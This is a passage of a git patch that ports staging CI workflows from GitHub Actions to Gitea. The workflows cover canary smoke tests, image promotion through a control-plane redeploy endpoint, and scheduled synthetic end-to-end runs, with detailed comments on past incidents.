pushes / forced updates differs from GitHub. The shallow-fetch + cat-file recovery branch handles the missing-base case correctly. 3. MOLECULE_STAGING_* secrets reused — verified at /etc/molecule-bootstrap/all-credentials.env that the names are defined. Tier-low because failure-mode is "smoke skip" + log warning, not silent green. DO NOT MERGE without orchestrator-dispatched Five-Axis review + @hongmingwang chat-go. Cross-links: - RFC: molecule-ai/internal#219 - Companions: PR#372, PR#378, PR#379, PR#383 Co-Authored-By: Claude Opus 4.7 (1M context) --- .gitea/workflows/canary-staging.yml | 310 ++++++++++++++++ .gitea/workflows/canary-verify.yml | 278 +++++++++++++++ .gitea/workflows/continuous-synth-e2e.yml | 255 ++++++++++++++ .gitea/workflows/e2e-api.yml | 333 ++++++++++++++++++ .gitea/workflows/e2e-staging-canvas.yml | 247 +++++++++++++ .gitea/workflows/e2e-staging-external.yml | 189 ++++++++++ .gitea/workflows/e2e-staging-saas.yml | 251 +++++++++++++ .gitea/workflows/e2e-staging-sanity.yml | 157 +++++++++ .../handlers-postgres-integration.yml | 282 +++++++++++++++ .gitea/workflows/harness-replays.yml | 262 ++++++++++++++ 10 files changed, 2564 insertions(+) create mode 100644 .gitea/workflows/canary-staging.yml create mode 100644 .gitea/workflows/canary-verify.yml create mode 100644 .gitea/workflows/continuous-synth-e2e.yml create mode 100644 .gitea/workflows/e2e-api.yml create mode 100644 .gitea/workflows/e2e-staging-canvas.yml create mode 100644 .gitea/workflows/e2e-staging-external.yml create mode 100644 .gitea/workflows/e2e-staging-saas.yml create mode 100644 .gitea/workflows/e2e-staging-sanity.yml create mode 100644 .gitea/workflows/handlers-postgres-integration.yml create mode 100644 .gitea/workflows/harness-replays.yml diff --git a/.gitea/workflows/canary-staging.yml b/.gitea/workflows/canary-staging.yml new file mode 100644 index 00000000..ff40d4db --- /dev/null +++ b/.gitea/workflows/canary-staging.yml @@ -0,0 +1,310 @@ +name: Canary — staging SaaS smoke (every 30 min) + +# Ported from .github/workflows/canary-staging.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Minimum viable health check: provisions one Hermes workspace on a fresh +# staging org, sends one A2A message, verifies PONG, tears down. ~8 min +# wall clock. Pages on failure by opening a GitHub issue; auto-closes the +# issue on the next green run. +# +# The full-SaaS workflow (e2e-staging-saas.yml) covers the broader surface +# but runs only on provisioning-critical pushes + nightly — this one +# catches drift in the 30-min window between those runs (AMI health, CF +# cert rotation, WorkOS session stability, etc.). +# +# Lean mode: E2E_MODE=canary skips the child workspace + HMA memory + +# peers/activity checks. One parent workspace + one A2A turn is enough +# to signal "SaaS stack end-to-end is alive." + +on: + schedule: + # Every 30 min. Cron on GitHub-hosted runners has a known drift of + # a few minutes under load — that's fine for a canary. + - cron: '*/30 * * * *' +# Serialise with the full-SaaS workflow so they don't contend for the +# same org-create quota on staging. Different group key from +# e2e-staging-saas since we don't mind queueing canaries behind one +# full run, but two canaries SHOULD queue against each other. +concurrency: + group: canary-staging + cancel-in-progress: false + +permissions: + # Needed to open / close the alerting issue. + issues: write + contents: read + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + canary: + name: Canary smoke + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + # 25 min headroom over the 15-min TLS-readiness deadline in + # tests/e2e/test_staging_full_saas.sh (#2107). Without the buffer + # the job is killed at the wall-clock 15:00 mark BEFORE the bash + # `fail` + diagnostic burst can fire, leaving every cancellation + # silent. Sibling staging E2E jobs run at 20-45 min — keeping + # canary tighter than them so a true wedge still surfaces here + # first. + timeout-minutes: 25 + + env: + MOLECULE_CP_URL: https://staging-api.moleculesai.app + MOLECULE_ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + # MiniMax is the canary's PRIMARY LLM auth path post-2026-05-04. + # Switched from hermes+OpenAI after #2578 (the staging OpenAI key + # account went over quota and stayed dead for 36+ hours, taking + # the canary red the entire time). claude-code template's + # `minimax` provider routes ANTHROPIC_BASE_URL to + # api.minimax.io/anthropic and reads MINIMAX_API_KEY at boot — + # ~5-10x cheaper per token than gpt-4.1-mini AND on a separate + # billing account, so OpenAI quota collapse no longer wedges the + # canary. Mirrors the migration continuous-synth-e2e.yml made on + # 2026-05-03 (#265) for the same reason. tests/e2e/test_staging_ + # full_saas.sh branches SECRETS_JSON on which key is present — + # MiniMax wins when set. + E2E_MINIMAX_API_KEY: ${{ secrets.MOLECULE_STAGING_MINIMAX_API_KEY }} + # Direct-Anthropic alternative for operators who don't want to + # set up a MiniMax account (priority below MiniMax — first + # non-empty wins in test_staging_full_saas.sh's secrets-injection + # block). See #2578 PR comment for the rationale. + E2E_ANTHROPIC_API_KEY: ${{ secrets.MOLECULE_STAGING_ANTHROPIC_API_KEY }} + # OpenAI fallback — kept wired so an operator-dispatched run with + # E2E_RUNTIME=hermes overridden via workflow_dispatch can still + # exercise the OpenAI path without re-editing the workflow. + E2E_OPENAI_API_KEY: ${{ secrets.MOLECULE_STAGING_OPENAI_KEY }} + E2E_MODE: canary + E2E_RUNTIME: claude-code + # Pin the canary to a specific MiniMax model rather than relying + # on the per-runtime default (which could resolve to "sonnet" → + # direct Anthropic and defeat the cost saving). M2.7-highspeed + # is "Token Plan only" but cheap-per-token and fast. + E2E_MODEL_SLUG: MiniMax-M2.7-highspeed + E2E_RUN_ID: "canary-${{ github.run_id }}" + # Debug-only: when an operator dispatches with keep_on_failure=true, + # the canary script's E2E_KEEP_ORG=1 path skips teardown so the + # tenant org + EC2 stay alive for SSM-based log capture. Cron runs + # never set this (the input only exists on workflow_dispatch) so + # unattended cron always tears down. See molecule-core#129 + # failure mode #1 — capturing the actual exception requires + # docker logs from the live container. + E2E_KEEP_ORG: ${{ github.event.inputs.keep_on_failure == 'true' && '1' || '0' }} + + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify admin token present + run: | + if [ -z "$MOLECULE_ADMIN_TOKEN" ]; then + echo "::error::MOLECULE_STAGING_ADMIN_TOKEN not set" + exit 2 + fi + + - name: Verify LLM key present + run: | + # Per-runtime key check — claude-code uses MiniMax; hermes / + # langgraph (operator-dispatched only) use OpenAI. Hard-fail + # rather than soft-skip per the lesson from synth E2E #2578: + # an empty key silently falls through to the wrong + # SECRETS_JSON branch and the canary fails 5 min later with + # a confusing auth error instead of the clean "secret + # missing" message at the top. + case "${E2E_RUNTIME}" in + claude-code) + # Either MiniMax OR direct-Anthropic works — first + # non-empty wins in the test script's secrets-injection + # priority chain. Operators only need to set ONE of these + # secrets; we don't force a choice between them. + if [ -n "${E2E_MINIMAX_API_KEY:-}" ]; then + required_secret_name="MOLECULE_STAGING_MINIMAX_API_KEY" + required_secret_value="${E2E_MINIMAX_API_KEY}" + elif [ -n "${E2E_ANTHROPIC_API_KEY:-}" ]; then + required_secret_name="MOLECULE_STAGING_ANTHROPIC_API_KEY" + required_secret_value="${E2E_ANTHROPIC_API_KEY}" + else + required_secret_name="MOLECULE_STAGING_MINIMAX_API_KEY or MOLECULE_STAGING_ANTHROPIC_API_KEY" + required_secret_value="" + fi + ;; + langgraph|hermes) + required_secret_name="MOLECULE_STAGING_OPENAI_KEY" + required_secret_value="${E2E_OPENAI_API_KEY:-}" + ;; + *) + echo "::warning::Unknown E2E_RUNTIME='${E2E_RUNTIME}' — skipping LLM-key check" + required_secret_name="" + required_secret_value="present" + ;; + esac + if [ -n "$required_secret_name" ] && [ -z "$required_secret_value" ]; then + echo "::error::${required_secret_name} secret not set for runtime=${E2E_RUNTIME} — A2A will fail at request time with 'No LLM provider configured'" + exit 2 + fi + echo "LLM key present ✓ (runtime=${E2E_RUNTIME}, key=${required_secret_name}, len=${#required_secret_value})" + + - name: Canary run + id: canary + run: bash tests/e2e/test_staging_full_saas.sh + + # Alerting: open a sticky issue on the FIRST failure; comment on + # subsequent failures; auto-close on next green. Comment-on-existing + # de-duplicates so a single open issue accumulates the streak — + # ops sees one issue with N comments rather than N issues. + # + # Why no consecutive-failures threshold (e.g., wait 3 runs before + # filing): the prior threshold check used + # `github.rest.actions.listWorkflowRuns()` which Gitea 1.22.6 does + # not expose (returns 404). On Gitea Actions the threshold call + # ALWAYS failed, breaking the entire alerting step and going days + # silent on real regressions (38h+ chronic red on 2026-05-07/08 + # before this fix; tracked in molecule-core#129). Filing on first + # failure is also better UX — we want to know about the first red, + # not wait 90 min for it to "count." Real flakes get one issue + + # a quick close-on-green; persistent reds accumulate comments. + - name: Open issue on failure (Gitea API) + if: failure() + env: + GITEA_TOKEN: ${{ secrets.GITHUB_TOKEN }} + REPO: ${{ github.repository }} + SERVER_URL: ${{ env.GITHUB_SERVER_URL }} + RUN_ID: ${{ github.run_id }} + run: | + set -euo pipefail + API="${SERVER_URL%/}/api/v1" + TITLE="Canary failing: staging SaaS smoke" + RUN_URL="${SERVER_URL}/${REPO}/actions/runs/${RUN_ID}" + + EXISTING=$(curl -fsS -H "Authorization: token $GITEA_TOKEN" \ + "${API}/repos/${REPO}/issues?state=open&type=issues&limit=50" \ + | jq -r --arg t "$TITLE" '.[] | select(.title==$t) | .number' | head -1) + + if [ -n "$EXISTING" ]; then + curl -fsS -X POST -H "Authorization: token $GITEA_TOKEN" -H "Content-Type: application/json" \ + "${API}/repos/${REPO}/issues/${EXISTING}/comments" \ + -d "$(jq -nc --arg run "$RUN_URL" '{body: ("Canary still failing. " + $run)}')" >/dev/null + echo "Commented on existing issue #${EXISTING}" + else + NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) + BODY=$(jq -nc --arg t "$TITLE" --arg now "$NOW" --arg run "$RUN_URL" \ + '{title: $t, body: ("Canary run failed at " + $now + ".\n\nRun: " + $run + "\n\nThis issue auto-closes on the next green canary run. Consecutive failures add a comment here rather than a new issue.")}') + curl -fsS -X POST -H "Authorization: token $GITEA_TOKEN" -H "Content-Type: application/json" \ + "${API}/repos/${REPO}/issues" -d "$BODY" >/dev/null + echo "Opened canary failure issue (first red)" + fi + + - name: Auto-close canary issue on success (Gitea API) + if: success() + env: + GITEA_TOKEN: ${{ secrets.GITHUB_TOKEN }} + REPO: ${{ github.repository }} + SERVER_URL: ${{ env.GITHUB_SERVER_URL }} + RUN_ID: ${{ github.run_id }} + run: | + set -euo pipefail + API="${SERVER_URL%/}/api/v1" + TITLE="Canary failing: staging SaaS smoke" + + NUMS=$(curl -fsS -H "Authorization: token $GITEA_TOKEN" \ + "${API}/repos/${REPO}/issues?state=open&type=issues&limit=50" \ + | jq -r --arg t "$TITLE" '.[] | select(.title==$t) | .number') + + NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) + for N in $NUMS; do + curl -fsS -X POST -H "Authorization: token $GITEA_TOKEN" -H "Content-Type: application/json" \ + "${API}/repos/${REPO}/issues/${N}/comments" \ + -d "$(jq -nc --arg now "$NOW" '{body: ("Canary recovered at " + $now + ". Closing.")}')" >/dev/null + curl -fsS -X PATCH -H "Authorization: token $GITEA_TOKEN" -H "Content-Type: application/json" \ + "${API}/repos/${REPO}/issues/${N}" -d '{"state":"closed"}' >/dev/null + echo "Closed recovered canary issue #${N}" + done + + - name: Teardown safety net + if: always() + env: + ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + run: | + set +e + # Slug prefix matches what test_staging_full_saas.sh emits + # in canary mode: + # SLUG="e2e-canary-$(date +%Y%m%d)-${RUN_ID_SUFFIX}" + # Earlier this was `e2e-{today}-canary-` — that was the + # full-mode pattern (date FIRST, mode SECOND); canary slugs + # have mode FIRST, date SECOND. The mismatch silently + # never matched, leaving every cancelled-canary EC2 alive + # until the once-an-hour sweep eventually caught it + # (incident 2026-04-26 21:03Z: 1h25m EC2 leak before manual + # cleanup; same gap on three earlier cancellations today). + orgs=$(curl -sS "$MOLECULE_CP_URL/cp/admin/orgs" \ + -H "Authorization: Bearer $ADMIN_TOKEN" 2>/dev/null \ + | python3 -c " + import json, sys, os, datetime + run_id = os.environ.get('GITHUB_RUN_ID', '') + d = json.load(sys.stdin) + # Scope to slugs from THIS canary run when GITHUB_RUN_ID is + # available; the canary workflow sets E2E_RUN_ID='canary-\${run_id}' + # so the slug suffix is '-canary-\${run_id}-...'. Mirrors the + # full-mode safety net's per-run scoping (e2e-staging-saas.yml) + # added after the 2026-04-21 cross-run cleanup incident. + # Sweep both today AND yesterday's UTC dates so a run that + # crosses midnight still cleans up its own slug — see the + # 2026-04-26→27 canvas-safety-net incident. + today = datetime.date.today() + yesterday = today - datetime.timedelta(days=1) + dates = (today.strftime('%Y%m%d'), yesterday.strftime('%Y%m%d')) + if run_id: + prefixes = tuple(f'e2e-canary-{d}-canary-{run_id}' for d in dates) + else: + prefixes = tuple(f'e2e-canary-{d}-' for d in dates) + candidates = [o['slug'] for o in d.get('orgs', []) + if any(o.get('slug','').startswith(p) for p in prefixes) + and o.get('status') not in ('purged',)] + print('\n'.join(candidates)) + " 2>/dev/null) + # Per-slug DELETE with HTTP-code verification. The previous + # `... >/dev/null || true` swallowed every failure, so a 5xx + # or timeout from CP looked identical to "successfully cleaned + # up" and the tenant kept eating ~2 vCPU until the hourly + # stale sweep caught it (up to 2h later). Now we capture the + # response code and surface non-2xx as a workflow warning, so + # the run page shows which slug leaked. We still don't `exit 1` + # on cleanup failure — a single-canary cleanup miss shouldn't + # fail-flag the canary itself when the actual smoke check + # passed. The sweep-stale-e2e-orgs cron (now every 15 min, + # 30-min threshold) is the safety net for whatever slips past. + # See molecule-controlplane#420. + leaks=() + for slug in $orgs; do + # Tempfile-routed -w + set +e/-e prevents curl-exit-code + # pollution of the captured status (lint-curl-status-capture.yml). + set +e + curl -sS -o /tmp/canary-cleanup.out -w "%{http_code}" \ + -X DELETE "$MOLECULE_CP_URL/cp/admin/tenants/$slug" \ + -H "Authorization: Bearer $ADMIN_TOKEN" \ + -H "Content-Type: application/json" \ + -d "{\"confirm\":\"$slug\"}" >/tmp/canary-cleanup.code + set -e + code=$(cat /tmp/canary-cleanup.code 2>/dev/null || echo "000") + if [ "$code" = "200" ] || [ "$code" = "204" ]; then + echo "[teardown] deleted $slug (HTTP $code)" + else + echo "::warning::canary teardown for $slug returned HTTP $code — sweep-stale-e2e-orgs will catch it within ~45 min. Body: $(head -c 300 /tmp/canary-cleanup.out 2>/dev/null)" + leaks+=("$slug") + fi + done + if [ ${#leaks[@]} -gt 0 ]; then + echo "::warning::canary teardown left ${#leaks[@]} leak(s): ${leaks[*]}" + fi + exit 0 diff --git a/.gitea/workflows/canary-verify.yml b/.gitea/workflows/canary-verify.yml new file mode 100644 index 00000000..d11cc7c5 --- /dev/null +++ b/.gitea/workflows/canary-verify.yml @@ -0,0 +1,278 @@ +name: canary-verify + +# Ported from .github/workflows/canary-verify.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# - **Gitea workflow_run trigger limitation**: Gitea 1.22.6's support +# for the `workflow_run` event is partial. If this never fires on a +# real publish-workspace-server-image completion, the follow-up +# triage PR should replace the trigger with a push-with-paths-filter +# on the same publish workflow's path (i.e. `.gitea/workflows/publish-workspace-server-image.yml`). +# + +# Runs the canary smoke suite against the staging canary tenant fleet +# after a new :staging- image lands in ECR. On green, calls the +# CP redeploy-fleet endpoint to promote :staging- → :latest so +# the prod tenant fleet's 5-minute auto-updater picks up the verified +# digest. On red, :latest stays on the prior known-good digest and +# prod is untouched. +# +# Registry note (2026-05-10): This workflow previously used GHCR +# (ghcr.io/molecule-ai/platform-tenant) — that registry was retired +# during the 2026-05-06 Gitea suspension migration when publish- +# workspace-server-image.yml switched to the operator's ECR org +# (153263036946.dkr.ecr.us-east-2.amazonaws.com/molecule-ai/ +# platform-tenant). The GHCR → ECR migration was never applied to +# this file, so canary-verify was silently smoke-testing the stale +# GHCR image while the actual staging/prod tenants ran the ECR image. +# Result: smoke tests could not catch a broken ECR build. Fix: +# - Wait step: reads SHA from running canary /health (tenant- +# agnostic, works regardless of registry). +# - Promote step: calls CP redeploy-fleet endpoint with target_tag= +# staging-, same mechanism as redeploy-tenants-on-main.yml. +# No longer attempts GHCR crane ops. +# +# Dependencies: +# - publish-workspace-server-image.yml publishes :staging- +# to ECR on staging and main merges. +# - Canary tenants are configured to pull :staging- from ECR +# (TENANT_IMAGE env set to the ECR :staging- tag). +# - Repo secrets CANARY_TENANT_URLS / CANARY_ADMIN_TOKENS / +# CANARY_CP_SHARED_SECRET are populated. + +on: + workflow_run: + workflows: ["publish-workspace-server-image"] + types: [completed] +permissions: + contents: read + packages: write + actions: read + +env: + # ECR registry (post-2026-05-06 SSOT for tenant images). + # publish-workspace-server-image.yml pushes here. + IMAGE_NAME: 153263036946.dkr.ecr.us-east-2.amazonaws.com/molecule-ai/platform + TENANT_IMAGE_NAME: 153263036946.dkr.ecr.us-east-2.amazonaws.com/molecule-ai/platform-tenant + # CP endpoint for redeploy-fleet (used in promote step below). + CP_URL: ${{ vars.CP_URL || 'https://staging-api.moleculesai.app' }} + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + canary-smoke: + # Skip when the upstream workflow failed — no image to test against. + # workflow_dispatch trigger dropped in this Gitea port; only the + # workflow_run path remains. + if: ${{ github.event.workflow_run.conclusion == 'success' }} + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + outputs: + sha: ${{ steps.compute.outputs.sha }} + smoke_ran: ${{ steps.smoke.outputs.ran }} + steps: + - name: Checkout + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Compute sha + id: compute + run: echo "sha=${GITHUB_SHA::7}" >> "$GITHUB_OUTPUT" + + - name: Wait for canary tenants to pick up :staging- + # Poll canary health endpoints every 30s for up to 7 min instead + # of a fixed 6-min sleep. Exits as soon as ALL canaries report + # the new SHA (~2-3 min typical vs 6 min fixed). Falls back to + # proceeding after 7 min even if not all canaries responded — + # the smoke suite will catch any that didn't update. + # + # NOTE: The SHA is read from the running tenant's /health response, + # NOT from a registry lookup. This is registry-agnostic and works + # regardless of whether the tenant pulls from ECR, GHCR, or any + # other registry — the canary is telling us what it's actually + # running, which is the ground truth for smoke testing. + env: + CANARY_TENANT_URLS: ${{ secrets.CANARY_TENANT_URLS }} + EXPECTED_SHA: ${{ steps.compute.outputs.sha }} + run: | + if [ -z "$CANARY_TENANT_URLS" ]; then + echo "No canary URLs configured — falling back to 60s wait" + sleep 60 + exit 0 + fi + IFS=',' read -ra URLS <<< "$CANARY_TENANT_URLS" + MAX_WAIT=420 # 7 minutes + INTERVAL=30 + ELAPSED=0 + while [ $ELAPSED -lt $MAX_WAIT ]; do + ALL_READY=true + for url in "${URLS[@]}"; do + HEALTH=$(curl -s --max-time 5 "${url}/health" 2>/dev/null || echo "{}") + SHA=$(echo "$HEALTH" | grep -o "\"sha\":\"[^\"]*\"" | head -1 | cut -d'"' -f4) + if [ "$SHA" != "$EXPECTED_SHA" ]; then + ALL_READY=false + break + fi + done + if $ALL_READY; then + echo "All canaries running staging-${EXPECTED_SHA} after ${ELAPSED}s" + exit 0 + fi + echo "Waiting for canaries... (${ELAPSED}s / ${MAX_WAIT}s)" + sleep $INTERVAL + ELAPSED=$((ELAPSED + INTERVAL)) + done + echo "Timeout after ${MAX_WAIT}s — proceeding anyway (smoke suite will validate)" + + - name: Run canary smoke suite + id: smoke + # Graceful-skip when no canary fleet is configured (Phase 2 not yet + # stood up — see molecule-controlplane/docs/canary-tenants.md). + # Sets `ran=false` on skip so promote-to-latest stays off (we don't + # want every main merge auto-promoting without gating). Manual + # promote-latest.yml is the release gate while canary is absent. + # Once the fleet is real: delete the early-exit branch. + env: + CANARY_TENANT_URLS: ${{ secrets.CANARY_TENANT_URLS }} + CANARY_ADMIN_TOKENS: ${{ secrets.CANARY_ADMIN_TOKENS }} + CANARY_CP_BASE_URL: https://staging-api.moleculesai.app + CANARY_CP_SHARED_SECRET: ${{ secrets.CANARY_CP_SHARED_SECRET }} + run: | + set -euo pipefail + if [ -z "${CANARY_TENANT_URLS:-}" ] \ + || [ -z "${CANARY_ADMIN_TOKENS:-}" ] \ + || [ -z "${CANARY_CP_SHARED_SECRET:-}" ]; then + { + echo "## ⚠️ canary-verify skipped" + echo + echo "One or more canary secrets are unset (\`CANARY_TENANT_URLS\`, \`CANARY_ADMIN_TOKENS\`, \`CANARY_CP_SHARED_SECRET\`)." + echo "Phase 2 canary fleet has not been stood up yet —" + echo "see [canary-tenants.md](https://git.moleculesai.app/molecule-ai/molecule-controlplane/blob/main/docs/canary-tenants.md)." + echo + echo "**Skipped — promote-to-latest will NOT auto-fire.** Dispatch \`promote-latest.yml\` manually when ready." + } >> "$GITHUB_STEP_SUMMARY" + echo "ran=false" >> "$GITHUB_OUTPUT" + echo "::notice::canary-verify: skipped — no canary fleet configured" + exit 0 + fi + bash scripts/canary-smoke.sh + echo "ran=true" >> "$GITHUB_OUTPUT" + + - name: Summary on failure + if: ${{ failure() }} + run: | + { + echo "## Canary smoke FAILED" + echo + echo "Canary tenants rejected image \`staging-${{ steps.compute.outputs.sha }}\`." + echo ":latest stays pinned to the prior good digest — prod is untouched." + echo + echo "Fix forward and merge again, or investigate the specific failed" + echo "assertions in the canary-smoke step log above." + } >> "$GITHUB_STEP_SUMMARY" + + promote-to-latest: + # On green, calls the CP redeploy-fleet endpoint with target_tag= + # staging- to promote the verified ECR image. This is the same + # mechanism as redeploy-tenants-on-main.yml — no GHCR crane ops. + # + # Pre-fix history: the old GHCR promote step used `crane tag` against + # ghcr.io/molecule-ai/platform-tenant, but publish-workspace-server- + # image.yml had already migrated to ECR on 2026-05-07 (commit + # 10e510f5). The GHCR tags were never updated, so this step was + # silently promoting a stale GHCR image while actual prod tenants + # pulled from ECR. Canary smoke tests were GHCR-targeted and could + # not catch a broken ECR build. + needs: canary-smoke + if: ${{ needs.canary-smoke.result == 'success' && needs.canary-smoke.outputs.smoke_ran == 'true' }} + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + env: + SHA: ${{ needs.canary-smoke.outputs.sha }} + CP_URL: ${{ vars.CP_URL || 'https://staging-api.moleculesai.app' }} + # CP_ADMIN_API_TOKEN gates write access to the redeploy endpoint. + # Stored at the repo level so all workflows pick it up automatically. + CP_ADMIN_API_TOKEN: ${{ secrets.CP_ADMIN_API_TOKEN }} + # canary_slug pin: deploy the verified :staging- to the canary + # first (soak 120s), then fan out to the rest of the fleet. + CANARY_SLUG: ${{ vars.CANARY_PROMOTE_SLUG || '' }} + SOAK_SECONDS: ${{ vars.CANARY_PROMOTE_SOAK || '120' }} + BATCH_SIZE: ${{ vars.CANARY_PROMOTE_BATCH || '3' }} + steps: + - name: Check CP credentials + run: | + if [ -z "${CP_ADMIN_API_TOKEN:-}" ]; then + echo "::error::CP_ADMIN_API_TOKEN secret is not set — promote step cannot call redeploy-fleet." + echo "::error::Set it at: repo Settings → Actions → Variables and Secrets → New Secret." + exit 1 + fi + + - name: Promote verified ECR image to :latest + run: | + set -euo pipefail + + TARGET_TAG="staging-${SHA}" + BODY=$(jq -nc \ + --arg tag "$TARGET_TAG" \ + --argjson soak "${SOAK_SECONDS:-120}" \ + --argjson batch "${BATCH_SIZE:-3}" \ + --argjson dry false \ + '{ + target_tag: $tag, + soak_seconds: $soak, + batch_size: $batch, + dry_run: $dry + }') + + if [ -n "${CANARY_SLUG:-}" ]; then + BODY=$(jq '. * {canary_slug: $slug}' --arg slug "$CANARY_SLUG" <<<"$BODY") + fi + + echo "Calling: POST $CP_URL/cp/admin/tenants/redeploy-fleet" + echo " target_tag: $TARGET_TAG" + echo " body: $BODY" + + HTTP_RESPONSE=$(mktemp) + HTTP_CODE_FILE=$(mktemp) + set +e + curl -sS -o "$HTTP_RESPONSE" -w '%{http_code}' \ + -m 1200 \ + -H "Authorization: Bearer $CP_ADMIN_API_TOKEN" \ + -H "Content-Type: application/json" \ + -X POST "$CP_URL/cp/admin/tenants/redeploy-fleet" \ + -d "$BODY" >"$HTTP_CODE_FILE" + CURL_EXIT=$? + set -e + + HTTP_CODE=$(cat "$HTTP_CODE_FILE" 2>/dev/null || echo "000") + [ -z "$HTTP_CODE" ] && HTTP_CODE="000" + + echo "HTTP $HTTP_CODE (curl exit $CURL_EXIT)" + cat "$HTTP_RESPONSE" | jq . || cat "$HTTP_RESPONSE" + + if [ "$HTTP_CODE" -ge 400 ]; then + echo "::error::CP redeploy-fleet returned HTTP $HTTP_CODE — refusing to proceed." + exit 1 + fi + + - name: Summary + run: | + { + echo "## Canary verified — :latest promoted via CP redeploy-fleet" + echo "" + echo "- **Target tag:** \`staging-${{ needs.canary-smoke.outputs.sha }}\`" + echo "- **Registry:** ECR (\`${TENANT_IMAGE_NAME}\`)" + echo "- **Canary slug:** \`${CANARY_SLUG:-}\` (soak ${SOAK_SECONDS}s)" + echo "- **Batch size:** ${BATCH_SIZE:-3}" + echo "" + echo "CP redeploy-fleet is rolling out the verified image across the prod fleet." + echo "The fleet's 5-minute health-check loop will pick up the update automatically." + } >> "$GITHUB_STEP_SUMMARY" diff --git a/.gitea/workflows/continuous-synth-e2e.yml b/.gitea/workflows/continuous-synth-e2e.yml new file mode 100644 index 00000000..f0ed9e8f --- /dev/null +++ b/.gitea/workflows/continuous-synth-e2e.yml @@ -0,0 +1,255 @@ +name: Continuous synthetic E2E (staging) + +# Ported from .github/workflows/continuous-synth-e2e.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Hard gate (#2342): cron-driven full-lifecycle E2E that catches +# regressions visible only at runtime — schema drift, deployment-pipeline +# gaps, vendor outages, env-var rotations, DNS / CF / Railway side-effects. +# +# Why this gate exists: +# PR-time CI catches code-level regressions but not deployment-time or +# integration-time ones. Today's empirical data: +# • #2345 (A2A v0.2 silent drop) — passed all unit tests, broke at +# JSON-RPC parse layer between sender and receiver. Visible only +# to a sender exercising the full path. +# • RFC #2312 chat upload — landed on staging-branch but never +# reached staging tenants because publish-workspace-server-image +# was main-only. Caught by manual dogfooding hours after deploy. +# Both would have surfaced within 15-20 min of regression if a +# continuous synth-E2E was running. +# +# Cadence: every 20 min (3x/hour). The script is conservatively +# bounded at 10 min wall-clock; even on degraded staging it should +# finish before the next firing. cron-overlap is guarded by the +# concurrency group below. +# +# Cost: ~3 runs/hour × 5-10 min × $0.008/min GHA = ~$0.50-$1/day. +# Plus a fresh tenant provisioned + torn down each run (Railway + +# AWS pennies). Negligible. +# +# Failure handling: when the run fails, the workflow exits non-zero +# and GitHub's standard email/notification path fires. Operators +# can subscribe to this workflow's failure channel for paging-grade +# alerting. + +on: + schedule: + # Every 10 minutes, on :02 :12 :22 :32 :42 :52. Three constraints: + # 1. Stay off the top-of-hour. GitHub Actions scheduler drops + # :00 firings under high load (own docs: + # https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#schedule). + # Prior history: cron was '0,20,40' (2026-05-02) — only :00 + # ever survived. Bumped to '10,30,50' (2026-05-03) on the + # theory that further-from-:00 wins. Empirically 2026-05-04 + # that ALSO dropped to ~60 min effective cadence (only ~1 + # schedule fire per hour — see molecule-core#2726). Detection + # latency was claimed 20 min, actual 60 min. + # 2. Avoid colliding with the existing :15 sweep-cf-orphans + # and :45 sweep-cf-tunnels — both hit the CF API and we + # don't want to fight for rate-limit tokens. + # 3. Avoid the :30 heavy slot (canary-staging /30, sweep-aws- + # secrets, sweep-stale-e2e-orgs every :15) — multiple + # overlapping cron registrations on the same minute is part + # of what GH drops under load. + # Solution: bump fires-per-hour 3 → 6 AND keep all slots in clean + # lanes (1-3 min away from any other cron). Even with empirically- + # observed ~67% GH drop ratio, 6 attempts/hour yields ~2 effective + # fires = ~30 min cadence; closer to the 20-min target than the + # current shape and provides a real degradation alarm if drops + # get worse. + - cron: '2,12,22,32,42,52 * * * *' +permissions: + contents: read + # No issue-write here — failures surface as red runs in the workflow + # history. If you want auto-issue-on-fail, add a follow-up step that + # uses gh issue create gated on `if: failure()`. Keeping the surface + # minimal until that's actually wanted. + +# Serialize so two firings can never overlap. Cron firing every 20 min +# but scripts conservatively bounded at 10 min — overlap shouldn't +# happen in steady state, but if a run hangs we don't want N more +# stacking up. +concurrency: + group: continuous-synth-e2e + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + synth: + name: Synthetic E2E against staging + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + # Bumped from 12 → 20 (2026-05-04). Tenant user-data install phase + # (apt-get 